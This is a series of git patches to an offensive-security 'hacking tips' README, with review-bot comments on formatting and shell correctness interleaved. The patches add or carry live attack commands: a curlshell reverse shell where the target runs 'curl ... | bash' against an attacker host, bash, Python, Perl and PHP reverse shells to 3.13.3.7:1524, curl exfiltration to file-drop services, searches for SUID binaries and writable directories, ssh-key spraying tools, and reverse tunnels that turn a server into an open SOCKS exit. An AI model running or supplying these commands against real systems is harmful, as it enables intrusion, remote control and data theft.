From 57aaebd1751872e0b329d79f615e4f057eb680b1 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 21 Sep 2023 17:23:35 +0100 Subject: [PATCH 01/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 2ed8c2e..240db79 100644 --- a/README.md +++ b/README.md @@ -1754,8 +1754,8 @@ Telegram Channels 1. [BookZillaaa](https://t.me/bookzillaaa) Mindmaps & Knowledge +1. [Compass Sec Cheat Sheets](https://github.com/CompassSecurity/Hacking_Tools_Cheat_Sheet) 1. [Active Directory](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg) -1. [Z Library](https://singlelogin.me)/[Z Library on TOR](http://bookszlibb74ugqojhzhg2a63w5i2atv5bqarulgczawnbmsb6s6qead.onion/) **12.ii. Cool Linux commands** From 3f93c4210c195abe7f1d8cb40109b614946f89f2 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 26 Sep 2023 08:49:48 +0100 Subject: [PATCH 02/56] Update README.md --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index 240db79..1464fd1 100644 --- a/README.md +++ b/README.md @@ -1599,6 +1599,8 @@ Virtual Private Servers 7. https://bithost.io - Reseller for DigitalOcean, Linode, Hetzner and Vultr (accepts Crypto) 8. https://www.privatelayer.com - Swiss based. +See [other KYC Free Services](https://kycnot.me/) ([.onion](http://kycnotmezdiftahfmc34pqbpicxlnx3jbf5p7jypge7gdvduu7i6qjqd.onion/)) + Proxies (we dont use any of those) 1. [V2Ray Proxies](https://github.com/mahdibland/V2RayAggregator) 2. [Hola Proxies](https://github.com/snawoot/hola-proxy) 
@@ -1657,6 +1659,7 @@ Comms 1. [Temp-Mail](https://temp-mail.org/en/) - Disposable email service with great Web GUI. Receive only. 1. [Quackr.Io](https://quackr.io/) - Disposable SMS/text messages (List of [Disposable-SMS-services](https://github.com/AnarchoTechNYC/meta/wiki/Disposable-SMS-services)). 1. [Crypton](https://crypton.sh/) - Rent a private SIM/SMS with crypto ([.onion](http://cryptonx6nsmspsnpicuihgmbbz3qvro4na35od3eht4vojdo7glm6yd.onion/)) +2. [List of "No KYC" Services](https://kycnot.me/) ([.onion](http://kycnotmezdiftahfmc34pqbpicxlnx3jbf5p7jypge7gdvduu7i6qjqd.onion/)) OpSec 1. [OpSec for Rebellions](https://medium.com/@hackerschoice/it-security-and-privacy-for-the-rebellions-of-the-world-db4023cadcca) - Start Here. The simplest 3 steps. From 4885c00ccfb19bd2567e82a723782067bd1ed74f Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 27 Sep 2023 18:45:36 +0100 Subject: [PATCH 03/56] Update README.md --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1464fd1..3034326 100644 --- a/README.md +++ b/README.md @@ -33,7 +33,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Check reachability from around the world](#check-reachable) 1. [Check/Scan Open Ports](#check-open-ports) 1. [Crack Passwords hashes](#bruteforce) - 1. [Brute Force Passwords](#bruteforce) + 1. [Brute Force Passwords / Keys](#bruteforce) 1. [Data Upload/Download/Exfil](#exfil) 1. [File Encoding/Decoding](#file-encoding) 1. [File transfer using cut & paste](#cut-paste) 
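Review bot: duplicate link. The same commit already adds kycnot.me with the identical .onion to the Virtual Private Servers list in the hunk above ("See other KYC Free Services"), so there are now two places to keep in sync when the URL changes. Pick one home for it (the Comms list next to Crypton is the better fit) and drop the other. Also, the new line is numbered `2.` in a list that uses `1.` for every other item; Markdown renumbers sequentially anyway, so match the surrounding convention.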
@@ -588,7 +588,7 @@ hashcat --username -w3 my-hash /usr/share/wordlists/rockyou.txt Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions) or use [Crackstation](https://crackstation.net) or [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or on [AWS](https://akimbocore.com/article/hashcracking-with-aws/). -**3.ix. Brute Force Passwords** +**3.ix. Brute Force Passwords / Keys** The following is for brute forcing (guessing) passwords of ONLINE SERVICES. @@ -613,6 +613,7 @@ Tools: * [THC Hydra](https://sectools.org/tool/hydra/) * [Medusa](https://www.geeksforgeeks.org/password-cracking-with-medusa-in-linux/) / [docs](http://foofus.net/goons/jmk/medusa/medusa.html) * [Metasploit](https://docs.rapid7.com/metasploit/bruteforce-attacks/) +* [Crowbar](https://github.com/galkan/crowbar) - great for trying all ssh keys on a target IP range. Username & Password lists: * `/usr/share/nmap/nselib/data` From b1a36c3d248a36f291602575a245d2fc5032f7fb Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 27 Sep 2023 18:48:24 +0100 Subject: [PATCH 04/56] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 3034326..68a3f34 100644 --- a/README.md +++ b/README.md @@ -1724,6 +1724,7 @@ Tunneling Exfil 1. [Blitz](https://github.com/hackerschoice/gsocket#blitz) - `blitz -l` / `blitz foo.txt` +2. [RedDrop](https://github.com/cyberbutler/RedDrop) - run your own Exfil Server 1. [Mega](https://mega.io/cmd) 2. [oshiAt](https://oshi.at/) - also on TOR. `curl -T foo.txt https://oshi.at` 5. [Transfer.sh](https://transfer.sh/) - `curl -T foo.txt https://transfer.sh` From 42bd0a973e3df95358565a1c829ee9c38c5aba25 Mon Sep 17 00:00:00 2001 
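Review bot: the Crowbar blurb ("great for trying all ssh keys on a target IP range") lands directly under the paragraph that says this section is for guessing passwords of ONLINE SERVICES. Since the heading was just renamed to "Passwords / Keys", add a half-sentence saying that the key case is spraying a directory of private keys against the ssh service (still an online guess, not hash cracking); otherwise readers will wonder why a key tool is listed here and not next to hashcat.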
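Review bot: the Exfil list numbering now reads 1, 2, 1, 2, 5 in the source after inserting RedDrop as `2.`. Markdown renders it sequentially, but the rest of the page numbers every item `1.`; use `1.` here too. The blurb should also say that RedDrop is self-hosted (you bring the server), which is the one thing that distinguishes it from the hosted drop services listed around it.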
From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 5 Oct 2023 10:33:56 +0100 Subject: [PATCH 05/56] Update README.md --- README.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/README.md b/README.md index 68a3f34..5ba8886 100644 --- a/README.md +++ b/README.md @@ -70,6 +70,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Clean logfile](#shell-clean-logs) 1. [Hide files from a User without root privileges](#shell-hide-files) 1. [Find out Linux Distro](#linux-info) + 2. [Find +s binaries / Find writeable directories](#suid) 1. [Crypto](#crypto) 1. [Generate quick random Password](#gen-password) 1. [Linux transportable encrypted filesystems](#crypto-filesystem) @@ -1413,6 +1414,17 @@ curl -sL bench.sh | bash # curl -sL yabs.sh | bash ``` + +**7.vi. Find +s files / Find writeable directory + +``` +find / -xdev -type f -perm /6000 -ls 2>/dev/null +``` + +``` +find / -xdev -writable 2>/dev/null +``` + --- ## 8. Crypto From d42e4b170d295f38198053684359c08c2203d4db Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 5 Oct 2023 10:36:12 +0100 Subject: [PATCH 06/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 5ba8886..7555024 100644 --- a/README.md +++ b/README.md @@ -1404,7 +1404,7 @@ cd $'\t' ```sh # Find out Linux Distribution -uname -a; lsb_release -a; cat /etc/*release /etc/issue* /proc/version +uname -a; lsb_release -a 2>/dev/null; cat /etc/*release /etc/issue* /proc/version /etc/hosts 2>/dev/null ``` ```sh From 18b3cd9c5093245167785455ddde0a09fb3eda0a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 5 Oct 2023 11:52:46 +0100 Subject: [PATCH 07/56] Update README.md --- README.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/README.md b/README.md index 7555024..0583725 100644 --- a/README.md +++ b/README.md 
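Review bot: the new heading `**7.vi. Find +s files / Find writeable directory` is missing its closing `**`, so everything up to the next bold marker renders bold. On the commands: `find / -xdev` stays on the root filesystem, so on hosts where /usr, /opt or /home are separate mounts the setuid binaries there are never listed; either drop `-xdev` and prune the pseudo-filesystems instead (`find / \( -path /proc -o -path /sys -o -path /dev \) -prune -o -type f -perm /6000 -ls 2>/dev/null`) or state that the command is per-mount. `-perm /6000` matches setuid or setgid, while `+s` in the heading reads as setuid only; a comment saying "suid or sgid" avoids the confusion. `find / -xdev -writable` lists every writable file, including all of the caller's own home, which is mostly noise; restrict it to `-type d` or exclude `$HOME` if it stays.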
@@ -1425,6 +1425,23 @@ find / -xdev -type f -perm /6000 -ls 2>/dev/null find / -xdev -writable 2>/dev/null ``` +Find all writeable directories: +```sh +wfind() { + local arr dir + + arr=("$@") + while [[ ${#arr[@]} -gt 0 ]]; do + dir=${arr[${#arr[@]}-1]} + unset 'arr[${#arr[@]}-1]' + find "$dir" -maxdepth 1 -type d -writable -ls 2>/dev/null + IFS=$'\n' arr+=($(find "$dir" -mindepth 1 -maxdepth 1 -type d ! -writable 2>/dev/null)) + done +} +# Usage: wfind / +# Usage: wfind /etc /var /usr +``` + --- ## 8. Crypto From 21aab4a0c207062e762a5a44bf999602ff214599 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 5 Oct 2023 11:53:25 +0100 Subject: [PATCH 08/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0583725..38664c4 100644 --- a/README.md +++ b/README.md @@ -1415,7 +1415,7 @@ curl -sL bench.sh | bash ``` -**7.vi. Find +s files / Find writeable directory +**7.vi. Find +s files / Find writeable directory** ``` find / -xdev -type f -perm /6000 -ls 2>/dev/null From 15724ddff708c69cae9beef660e0b779ff04f3a1 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 5 Oct 2023 13:13:52 +0100 Subject: [PATCH 09/56] Update README.md --- README.md | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/README.md b/README.md index 38664c4..10c8a87 100644 --- a/README.md +++ b/README.md @@ -1417,14 +1417,11 @@ curl -sL bench.sh | bash **7.vi. Find +s files / Find writeable directory** +Find all suid/sgid binaries: ``` find / -xdev -type f -perm /6000 -ls 2>/dev/null ``` -``` -find / -xdev -writable 2>/dev/null -``` - Find all writeable directories: ```sh wfind() { From 2d3c9435d02b2f4ecfd065a4f32f550d00643ab9 Mon Sep 17 00:00:00 2001 
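Review bot: `IFS=$'\n' arr+=(...)` does not scope IFS to that one assignment. With no command word on the line, both assignments run in the current shell, so IFS stays set to newline for the rest of the function and, because `local arr dir` does not include IFS, for the caller's shell after `wfind` returns. Add `IFS` to the `local` line. The unquoted `$(find ...)` is also subject to pathname expansion, so a directory named `*` or `?` expands to its siblings; `set -f` inside the function (restored on exit) or `mapfile -t` avoids that. Two things deserve a comment in the block: the function deliberately stops descending below the first writable directory it finds, which is why `! -writable` is the recursion filter (it looks like a bug at first glance), and `wfind /` walks /proc and /sys, which are huge and report entries under /proc/self as writable, so prune them. Finally, sticky-bit directories (/tmp, /var/tmp) are reported as writable, which is true but rarely what a privilege-escalation search wants; `! -perm -1000` filters them.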
From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 6 Oct 2023 13:39:22 +0100 Subject: [PATCH 10/56] Update README.md --- README.md | 26 +++++++++++++++++++++----- 1 file changed, 21 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 10c8a87..afe1bd4 100644 --- a/README.md +++ b/README.md @@ -49,6 +49,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Reverse Shells](#reverse-shell) 1. [with gs-netcat](#reverse-shell-gs-netcat) 1. [with Bash](#reverse-shell-bash) + 2. [with cURL](#curlshell) 1. [without Bash](#reverse-shell-no-bash) 1. [with remote.moe](#revese-shell-remote-moe) 1. [with Python](#reverse-shell-python) @@ -1082,8 +1083,23 @@ bash -c '(exec bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) &' bash -c '(exec -a kqueue bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) &' ``` + +**5.i.c. Reverse shell with cURL** + +Use [curlshell](https://github.com/SkyperTHC/curlshell). This also works through proxies and when direct TCP connection to the outside world is prohibited: +```sh +# Generate SSL keys: +openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC" +# Start your listening server: +./curlshell.py --certificate cert.pem --private-key key.pem --listen-port 8080 +``` +```sh +# On the target: +curl -skfL https://1.2.3.4:8080 | bash +``` + -**5.i.c. Reverse shell without Bash** +**5.i.d. Reverse shell without Bash** Embedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet: 
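Review bot: `curl -skfL https://1.2.3.4:8080 | bash` disables certificate verification (`-k`), so anyone in the path who can complete the TLS handshake feeds commands straight into `bash` on the target; the channel is confidential but the listener is not authenticated. Since `cert.pem` is yours, pin it instead: `curl -sfL --pinnedpubkey sha256//BASE64HASH https://3.13.3.7:8080 | bash`, where the hash comes from `openssl x509 -in cert.pem -pubkey -noout | openssl pkey -pubin -outform der | openssl dgst -sha256 -binary | base64` (`--cacert cert.pem` will not work here because the cert has no SAN for the IP). Also the example IP `1.2.3.4` does not match the `3.13.3.7` placeholder used by every other reverse shell on the page; change it here rather than in a follow-up. Minor: the TOC entry is numbered `2.` between `1.` entries.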
@@ -1114,7 +1130,7 @@ Note: Use */tmp/.fio* if */dev/shm* is not available. Note: This trick logs your commands to a file. The file will be *unlinked* from the fs after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. -**5.i.d. Reverse shell with remote.moe and ssh** +**5.i.e. Reverse shell with remote.moe and ssh** It is possible to tunnel raw TCP (e.g bash reverse shell) through [remote.moe](https://remote.moe): @@ -1141,13 +1157,13 @@ rm -f /tmp/.p /tmp/.r; ssh-keygen -q -t rsa -N "" -f /tmp/.r && mkfifo /tmp/.p & ``` -**5.i.e. Reverse shell with Python** +**5.i.f. Reverse shell with Python** ```sh python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` -**5.i.f. Reverse shell with Perl** +**5.i.g. Reverse shell with Perl** ```sh # method 1 @@ -1156,7 +1172,7 @@ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotob perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' ``` -**5.i.g. Reverse shell with PHP** +**5.i.h. Reverse shell with PHP** ```sh php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");' From 1edccd966a357c0ab6a026fcf3380fad348f1eef Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 6 Oct 2023 16:21:45 +0100 Subject: [PATCH 11/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index afe1bd4..158f7c6 100644 --- a/README.md +++ b/README.md 
@@ -296,7 +296,7 @@ thcssh() { local ttyp echo -e "\e[0;35mTHC says: pimp up your prompt: Cut & Paste the following into your remote shell:\e[0;36m" - echo -e 'PS1="{THC} \[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ "\e[0m' + echo -e "PS1='{THC} \[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '\e[0m" ttyp=$(stty -g) stty raw -echo opost [[ $(ssh -V 2>&1) == OpenSSH_[67]* ]] && a="no" From f7013b09111cdd0900b89b6420dac84b44f3c860 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 6 Oct 2023 16:29:08 +0100 Subject: [PATCH 12/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 158f7c6..9346c4c 100644 --- a/README.md +++ b/README.md @@ -296,7 +296,7 @@ thcssh() { local ttyp echo -e "\e[0;35mTHC says: pimp up your prompt: Cut & Paste the following into your remote shell:\e[0;36m" - echo -e "PS1='{THC} \[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '\e[0m" + echo -e "PS1='"'{THC} \[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'\e[0m" ttyp=$(stty -g) stty raw -echo opost [[ $(ssh -V 2>&1) == OpenSSH_[67]* ]] && a="no" From 947c8c2faec0c11efaf7acc9edbb839a4db3ab90 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 09:27:57 +0100 Subject: [PATCH 13/56] Update README.md --- README.md | 25 +++++++++++++++++++++++-- 1 file changed, 23 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 9346c4c..f8b970b 100644 --- a/README.md +++ b/README.md 
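Review bot: moving the outer quotes from single to double changes what reaches `echo -e`. Inside double quotes the shell already collapses `\\033` to `\033`, and `echo -e` then turns that into a real ESC byte, so the printed PS1 line now contains raw escape bytes instead of the literal text `\033[36m` the user is supposed to cut and paste. The old single-quoted form passed `\\033` through untouched. The motivation (emit `PS1='...'` so that `\$` survives on the remote side instead of collapsing to `$`) is right, but the escape sequences themselves have to stay inside single quotes, as the next commit in this series does.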
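Review bot: this restores the literal `\\033` by putting the escapes back inside single quotes, so `echo -e` only processes the outer `\e[0m`; that fixes the raw-ESC output introduced by the previous commit. The `"PS1='"'...'"'\e[0m"` concatenation is hard to read and easy to break again, though. `printf` does no backslash processing on `%s` arguments, so the same line without the quote juggling is `printf '%s\e[0m\n' "PS1='{THC} \[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\\$ '"` (only `\\$` needs doubling, for the shell's own double-quote handling).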
@@ -28,6 +28,8 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Discover hosts](#discover) 1. [Tcpdump](#tcpdump) 1. [Tunnel and forwarding](#tunnel) + 1. [Raw TCP reverse ports](#ports) + 1. [HTTPS reverse forwards](#https) 1. [Use any tool via Socks Proxy](#scan-proxy) 1. [Find your public IP address](#your-ip) 1. [Check reachability from around the world](#check-reachable) @@ -446,8 +448,27 @@ openssl s_client -connect smtp.gmail.com:465 socat TCP-LISTEN:25,reuseaddr,fork openssl-connect:smtp.gmail.com:465 ``` + +**3.iii.a Raw TCP reverse ports** + +Using [segfault.net])(https://thc.org/segfault.net) (free): +```sh +echo "Your public IP:PORT is $(cat /config/self/reverse_ip):$(cat /config/self/reverse_port)" +nc -vnlp $(cat /config/self/reverse_port) +``` + +Using [bore.pub](https://github.com/ekzhang/bore) (free): +```sh +# Forward a random public TCP port to localhost:31337 +bore local 31337 --to bore.pub``` +``` + +See also [remote.moe](?revese-shell-remote-moe) (free) to forward raw TCP from the target to your workstation or [ngrok](https://ngrok.com/) (paid subscription) to forward a raw public TCP port. + +Other free services are limited to forward HTTPS only (not raw TCP). Some tricks below show how to tunnel raw TCP over HTTPS forwards (using websockets). + -**3.iii.b. HTTPS reverse tunnels** +**3.iii.b HTTPS reverse tunnels** On the server: ```sh @@ -590,7 +611,7 @@ hashcat --username -w3 my-hash /usr/share/wordlists/rockyou.txt Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions) or use [Crackstation](https://crackstation.net) or [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or on [AWS](https://akimbocore.com/article/hashcracking-with-aws/). -**3.ix. Brute Force Passwords / Keys** +**3.xi. Brute Force Passwords / Keys** The following is for brute forcing (guessing) passwords of ONLINE SERVICES. 
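Review bot: the new anchors `#ports` and `#https` are generic names on a page that already carries dozens of anchors (`#tunnel`, `#scan-proxy`, `#exfil`, ...); follow the existing prefix style (`#tunnel-tcp`, `#tunnel-https`) so they cannot collide with a later section and so the target is obvious from the link text.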
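Review bot: three rendering bugs in the 3.iii.a hunk: `[segfault.net])(https://thc.org/segfault.net)` has a stray `]` so the link breaks; `bore local 31337 --to bore.pub```` puts the closing fence on the command line, which leaves the block open and swallows the following line; and `[remote.moe](?revese-shell-remote-moe)` uses `?` where an in-page anchor needs `#` (the anchor is also misspelled `revese`; since other links already point at it, fix it everywhere in one commit or leave it alone). On content: `cat /config/self/reverse_ip` and `reverse_port` only exist on a segfault.net server; say so next to the command. `nc -vnlp PORT` is the traditional-netcat spelling; OpenBSD nc refuses `-p` together with `-l` on several versions, so note the `nc -vnl PORT` alternative.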
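Review bot: the heading jumps from `3.ix` to `3.xi`, skipping `3.x`, but nothing in this patch adds two new `3.` subsections ahead of it: 3.iii.a and 3.iii.b are children of 3.iii, and the hashcat context line right above shows the same preceding section as before. Either the intended number is `3.x`, or the hunk that renumbers the preceding headings is missing from this change; check the TOC order against the heading numbers before merging.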
From d03a83a335e0daf7d5504d35c9af952da8a6ab18 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 09:28:58 +0100 Subject: [PATCH 14/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index f8b970b..7324b32 100644 --- a/README.md +++ b/README.md @@ -463,7 +463,7 @@ Using [bore.pub](https://github.com/ekzhang/bore) (free): bore local 31337 --to bore.pub``` ``` -See also [remote.moe](?revese-shell-remote-moe) (free) to forward raw TCP from the target to your workstation or [ngrok](https://ngrok.com/) (paid subscription) to forward a raw public TCP port. +See also [remote.moe](#revese-shell-remote-moe) (free) to forward raw TCP from the target to your workstation or [ngrok](https://ngrok.com/) (paid subscription) to forward a raw public TCP port. Other free services are limited to forward HTTPS only (not raw TCP). Some tricks below show how to tunnel raw TCP over HTTPS forwards (using websockets). From 70cef1de330c44e6ba132d6f0f06ec2bf379be32 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 09:29:27 +0100 Subject: [PATCH 15/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7324b32..00457ca 100644 --- a/README.md +++ b/README.md @@ -451,7 +451,7 @@ socat TCP-LISTEN:25,reuseaddr,fork openssl-connect:smtp.gmail.com:465 **3.iii.a Raw TCP reverse ports** -Using [segfault.net])(https://thc.org/segfault.net) (free): +Using [segfault.net](https://thc.org/segfault.net) (free): ```sh echo "Your public IP:PORT is $(cat /config/self/reverse_ip):$(cat /config/self/reverse_port)" nc -vnlp $(cat /config/self/reverse_port) From 8e32477074ce8b93bd7f76d5cf88aea8d671a135 Mon Sep 17 00:00:00 2001 
From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 09:43:15 +0100 Subject: [PATCH 16/56] Update README.md --- README.md | 21 ++++++++++++--------- 1 file changed, 12 insertions(+), 9 deletions(-) diff --git a/README.md b/README.md index 00457ca..275528e 100644 --- a/README.md +++ b/README.md @@ -470,9 +470,9 @@ Other free services are limited to forward HTTPS only (not raw TCP). Some tricks **3.iii.b HTTPS reverse tunnels** -On the server: +On the server, use any one of these three tunneling services: ```sh -### Reverse HTTPS tunnel to forward public HTTPS requests to Port 8080 on this server: +### Reverse HTTPS tunnel to forward public HTTPS requests to this server's port 8080: ssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@localhost.run ### Or using remote.moe ssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@remote.moe 
@@ -481,29 +481,32 @@ curl -fL -o cloudflared https://github.com/cloudflare/cloudflared/releases/lates chmod 755 cloudflared cloudflared tunnel --url http://localhost:8080 --no-autoupdate ``` -Either tunnel will generate a new HTTPS-URL for you. Use this URL on your workstation (see below). Use [Gost](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) to tunnel raw TCP over the HTTP(s) link. +Either service will generate a new temporary HTTPS-URL for you to use. Optionally, use [Gost](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) on both ends to tunnel raw TCP over the HTTPS URL. -A simple STDIN/STDOUT pipe via HTTPS: +A. A simple STDIN/STDOUT pipe via HTTPS: ```sh +### On the server convert WebSocket to raw TCP: websocat -s 8080 -### and on the workstation use this command to connect: +``` +```sh +### On the remote target forward stdin/stdout to WebSocket: websocat wss:// ``` -Or run a Socks-Proxy (via HTTPS): +B. Forward raw TCP via HTTPS: ```sh ### On the server gost -L mws://:8080 ``` -On the workstation: - Forward port 2222 to the server's port 22. ```sh +### On the workstation: gost -L tcp://:2222/127.0.0.1:22 -F 'mwss://:443' ``` -or use it as a Socks-Proxy: +or use the server as an Socks-Proxy EXIT node (from the workstation, via the HTTPS reverse tunnel): ```sh +### On the workstation: gost -L :1080 -F 'mwss://:443' ### Test the Socks-proxy: curl -x socks5h://0 ipinfo.io From 8bc58c8cf3278d08f8db609e09a28b408777dad7 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 09:51:44 +0100 Subject: [PATCH 17/56] Update README.md --- README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 275528e..04aa84e 100644 --- a/README.md +++ b/README.md 
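Review bot: the hostnames in `websocat wss://` and `-F 'mwss://:443'` are empty as rendered; if the source uses an angle-bracket placeholder it is being eaten as an HTML tag, so write it in a form that survives (e.g. `wss://HTTPS-URL-FROM-ABOVE`), otherwise the reader cannot tell what goes there. Second, both server listeners are unauthenticated: `websocat -s 8080` hands its stdin/stdout to whoever first connects to the public URL, and `gost -L mws://:8080` published through the HTTPS tunnel is an open SOCKS5 exit through your server (the sentence later in this series literally advertises "access any host inside the server's network or even the Internet"). gost takes credentials in the listener URL (`-L mws://user:pass@:8080`, with the same `user:pass@` in the client's `-F 'mwss://...'`), and the tunnel services cannot strip them; add that to the example or at least state the exposure. Wording: "Either service" now refers to three services; "Any of these" fits.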
@@ -495,7 +495,7 @@ websocat wss:// B. Forward raw TCP via HTTPS: ```sh -### On the server +### On the server: Gost will translate any HTTP-websocket request to any raw TCP socks5 request: gost -L mws://:8080 ``` @@ -503,8 +503,10 @@ Forward port 2222 to the server's port 22. ```sh ### On the workstation: gost -L tcp://:2222/127.0.0.1:22 -F 'mwss://:443' +### Test the connection (will connect to localhost:22 on the server) +nc -vn 127.0.0.1 2222 ``` -or use the server as an Socks-Proxy EXIT node (from the workstation, via the HTTPS reverse tunnel): +or use the server as a Socks-Proxy EXIT node (e.g. access any host inside the server's network or even the Internet via the server (using the HTTPS reverse tunnel from above): ```sh ### On the workstation: gost -L :1080 -F 'mwss://:443' From 43ebd78d7728497795f3868c17f37b4b78a0eb7b Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 09:52:25 +0100 Subject: [PATCH 18/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 04aa84e..3109259 100644 --- a/README.md +++ b/README.md @@ -460,7 +460,7 @@ nc -vnlp $(cat /config/self/reverse_port) Using [bore.pub](https://github.com/ekzhang/bore) (free): ```sh # Forward a random public TCP port to localhost:31337 -bore local 31337 --to bore.pub``` +bore local 31337 --to bore.pub ``` See also [remote.moe](#revese-shell-remote-moe) (free) to forward raw TCP from the target to your workstation or [ngrok](https://ngrok.com/) (paid subscription) to forward a raw public TCP port. From 3ff01be6581ae05d8131d136048b7a6dd407ccef Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 10 Oct 2023 12:14:37 +0100 Subject: [PATCH 19/56] Update README.md --- README.md | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 3109259..dc1fde8 100644 --- a/README.md +++ b/README.md 
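Review bot: unbalanced parentheses in the new sentence: "Socks-Proxy EXIT node (e.g. access any host inside the server's network or even the Internet via the server (using the HTTPS reverse tunnel from above):" opens two and closes one. The `nc -vn 127.0.0.1 2222` test is a good addition, but say what success looks like (an `SSH-2.0-...` banner from the server): the local gost listener accepts the TCP connection before the remote hop is dialled, so `nc -v` can still print "succeeded" when the tunnel is broken.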
